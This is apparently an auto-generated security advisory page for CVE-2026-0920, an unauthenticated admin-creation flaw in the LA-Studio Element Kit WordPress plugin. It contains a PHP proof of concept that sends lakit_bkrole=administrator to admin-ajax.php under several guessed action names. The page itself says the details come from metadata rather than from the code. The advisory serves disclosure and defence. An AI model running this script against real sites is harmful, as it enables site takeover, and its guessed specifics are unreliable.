Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-0920: LA-Studio Element Kit for Elementor <= 1.5.6.3 – Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter (lastudio-element-kit)

CVE ID CVE-2026-0920
Plugin lastudio-element-kit
Severity Critical (CVSS 9.8)
CWE 269
Vulnerable Version 1.5.6.3
Patched Version
Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0920 (metadata-based):
The LA-Studio Element Kit for Elementor WordPress plugin contains an unauthenticated privilege escalation vulnerability. Attackers can create administrative user accounts by exploiting improper privilege management in the registration function. The CVSS 9.8 score reflects complete network accessibility, no authentication requirements, and full system compromise potential.

CWE-269 indicates the plugin fails to properly manage privilege assignment during user registration. The description confirms the ‘ajax_register_handle’ function does not restrict user role selection. Atomic Edge research infers the function accepts user-supplied role parameters without authorization checks. This conclusion comes from the CWE classification and vulnerability description, not direct code examination. The plugin likely processes registration requests through WordPress AJAX endpoints without capability verification.

Exploitation occurs through WordPress AJAX endpoints. Attackers send POST requests to /wp-admin/admin-ajax.php with action=lastudio_element_kit_ajax_register_handle or similar plugin-specific AJAX actions. The payload includes registration parameters with lakit_bkrole set to administrator or equivalent role identifier. No authentication or nonce verification is required. The attack vector matches typical WordPress plugin AJAX handler patterns where user registration functions lack proper authorization.

Remediation requires implementing proper privilege management controls. The patched version likely adds role validation within the registration function. Code should verify users cannot assign privileged roles during self-registration. WordPress capability checks like current_user_can(‘create_users’) should precede role assignment. Role parameters should be validated against an allowed list of non-privileged roles. The fix may also include nonce verification for the AJAX request.

Successful exploitation creates administrative user accounts with full WordPress control. Attackers gain complete site access, including plugin/theme management, content modification, and user administration. This enables further attacks like backdoor installation, data theft, or site defacement. The vulnerability provides initial access that can lead to complete system compromise within WordPress’s security context.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-0920 - LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter

<?php
/**
 * Proof of Concept for CVE-2026-0920
 * Assumptions based on vulnerability description:
 * 1. Plugin uses WordPress AJAX handler pattern
 * 2. AJAX action name derives from plugin slug 'lastudio-element-kit'
 * 3. Registration endpoint accepts 'lakit_bkrole' parameter
 * 4. No authentication or nonce required
 */

$target_url = 'https://example.com';

// Common AJAX action patterns for this plugin
$possible_actions = [
    'lastudio_element_kit_ajax_register_handle', // Most likely based on description
    'lastudio_element_kit_register',
    'lakit_ajax_register',
    'element_kit_register'
];

foreach ($possible_actions as $action) {
    $url = $target_url . '/wp-admin/admin-ajax.php';
    
    $post_data = [
        'action' => $action,
        'lakit_bkrole' => 'administrator', // Role parameter from description
        // Additional registration parameters typically required
        'username' => 'attacker_' . bin2hex(random_bytes(4)),
        'email' => 'attacker_' . bin2hex(random_bytes(4)) . '@example.com',
        'password' => 'Password123!',
        'password_confirm' => 'Password123!'
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "Testing action: {$action}n";
    echo "HTTP Code: {$http_code}n";
    echo "Response: {$response}nn";
    
    curl_close($ch);
    
    // Check for success indicators
    if (strpos($response, 'success') !== false || 
        strpos($response, 'user_id') !== false ||
        strpos($response, 'created') !== false) {
        echo "[+] Potential success with action: {$action}n";
        break;
    }
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School